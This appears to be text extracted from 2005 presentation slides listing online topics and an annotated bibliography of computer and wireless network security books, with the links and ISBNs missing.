CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Online Resources AFH Topics People are stupid: Wireless Equivalent Privacy: People are stupid 2: Wireless Encryption Protocol: HAARP: ; ECHELON: pdf/rapport_echelon_en.pdf pdf/rapport_echelon_en.pdf TEMPEST:

Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. CIA XXIV

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Offline Resources Books/Articles: Computer Security Essentials   Skoudis, Ed, Counterhack, Upper Saddle River, NJ: Prentice Hall PTR ISBN (amazing book! dozens of black hat techniques with countermeasures)   Cheswick WR, Bellovin SM, Firewalls and Internet Security: Repelling the Wily Hacker, New York: Addison-Wesley Publishing Company ISBN (a classic)   Chapman, D. Brent and Zwicky, Elizabeth D., Building Internet Firewalls, Sebastopol, CA: O'Reilly & Associates, ISBN (first edition includes excellent appendix on basics of ISO/OSI TCP/IP stack)   Anonymous, Maximum Security, Fourth Ed., Indianapolis: SAMS Publishing Dec 2002 (excellent resource)

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Offline Resources Books/Articles: WLAN Security   Duntemann J, Jeff Duntemann’s Drive-by WiFi Guide, Scottsdale: Paraglyph Press, ISBN (very readable & entertaining; most practical 3-space reference thus far)   Peikari C, Fogie S, Wireless Maximum Security, Indianapolis: Sams Publishing, ISBN (contains some errors [er, Wireless Equivalent Privacy? To paraphrase the song, 1/3 ain’t good.])   Edney J, Arbaugh WA, Real Security: WiFi Protected Access and i, Boston (etc.): Addison-Wesley, 2004 (almost incomprehensible at times, but good reference)   Vladimirov A, Gavrilenko K, Mikhailovsky A, Wi-Foo: The Secrets of Wireless Hacking, Boston (etc.), Addison-Wesley, 2004 (Good overview of WLAN security from Black Hat perspective; grammatical issues)